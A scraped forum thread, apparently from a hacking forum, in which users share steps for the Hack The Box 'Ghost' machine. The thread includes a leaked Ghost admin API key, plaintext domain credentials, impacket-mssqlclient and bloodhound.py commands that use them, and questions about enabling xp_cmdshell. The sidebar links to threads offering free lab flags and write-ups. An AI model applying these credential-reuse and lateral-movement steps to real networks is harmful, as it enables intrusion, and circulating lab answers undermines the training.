Jul 14, 2024, 09:12 AM
does anyone know what to do once we have gotten a reverse shell?
|
Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
|
|
Jul 14, 2024, 09:12 AM
does anyone know what to do once we have gotten a reverse shell?
Jul 14, 2024, 09:17 AM
found not much in 'florence.ramirez@LINUX-DEV-WS01:~$'
florence.ramirez@LINUX-DEV-WS01:~$ ls -la /home/GHOST/florence.ramirez ls -la /home/GHOST/florence.ramirez total 8 drwxr-xr-x 2 root root 4096 Feb 1 23:47 . drwxr-xr-x 3 root root 4096 Feb 1 23:47 .. lrwxrwxrwx 1 root root 9 Feb 1 23:47 .bash_history -> /dev/null
Jul 14, 2024, 09:20 AM
port 8000 is open on that 172 address in hosts and the 10 just times out.....I was gonna try and see what's there
this one of those rare windows boxes running a linux container or vm.......
Jul 14, 2024, 09:25 AM
Quote:key = '65bc2f4126db7d00010702ca:55466083d9d8ee5a8c424efa944369dd4b573f5cc807011578f6e02695556c40' Found in the ghost.db using the LFI. With this you can create a JWT and access the ghost admin API as described at https://ghost.org/docs/admin-api/ Probably not relevant. There is also a hash for kaythrn but it can't be cracked. The florence.ramirez ssh credentials are valid domain credentials. With it we can run bloodhound and connect to mssql. impacket-mssqlclient florence.ramirez:'uxLmt*udNc6t3HrF'@ghost.htb -windows-authWith mssql we get a useless NTLMv2-SSP Hash and traverse the windows filesystem. ADFS_GMSA$ and JUSTIN.BRADLEY are remote management users. Probably we have to get to one of those.
mssql login with this user and get cmd shell afterthat get windoes shell
(Jul 14, 2024, 09:25 AM)ritualist Wrote:Quote:key = '65bc2f4126db7d00010702ca:55466083d9d8ee5a8c424efa944369dd4b573f5cc807011578f6e02695556c40' how to enable xp_cmdshell This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Jul 14, 2024, 10:19 AM
(Jul 14, 2024, 09:25 AM)ritualist Wrote:Quote:key = '65bc2f4126db7d00010702ca:55466083d9d8ee5a8c424efa944369dd4b573f5cc807011578f6e02695556c40' looks like florence.ramirez doesn't have enough permission for xp_cmdshell SQL (GHOST\florence.ramirez guest@master)> enable_xp_cmdshell;
Jul 14, 2024, 10:24 AM
so how to bypass .. someone bypass that way and get a mssql seever shell
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
bloodhound works with florence.ramirez without mssql server
bloodhound.py -d ghost.htb -c All -ns 10.x.x.x --zip -u florence.ramirez -p 'uxLmt*udNc6t3HrF' --use-ldap
Jul 14, 2024, 10:40 AM
Jul 14, 2024, 10:45 AM
(Jul 14, 2024, 10:40 AM)ZeetaOnline Wrote:(Jul 14, 2024, 10:24 AM)osamy7593 Wrote: so how to bypass .. someone bypass that way and get a mssql seever shell yes he logged as mysql server account This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] CPTS 12 FLAGS | 68 | 1,930 |
6 hours ago Last Post: VictorPipeau |
||
| [FREE] HackTheBox Dante - complete writeup written by Tamarisk | 601 | 91,530 |
6 hours ago Last Post: VictorPipeau |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 371 | 92,796 |
7 hours ago Last Post: phannguyenbaouy1 |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 21 | 2,611 |
10 hours ago Last Post: popoler |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,268 |
Yesterday, 02:10 PM Last Post: kkkato |
||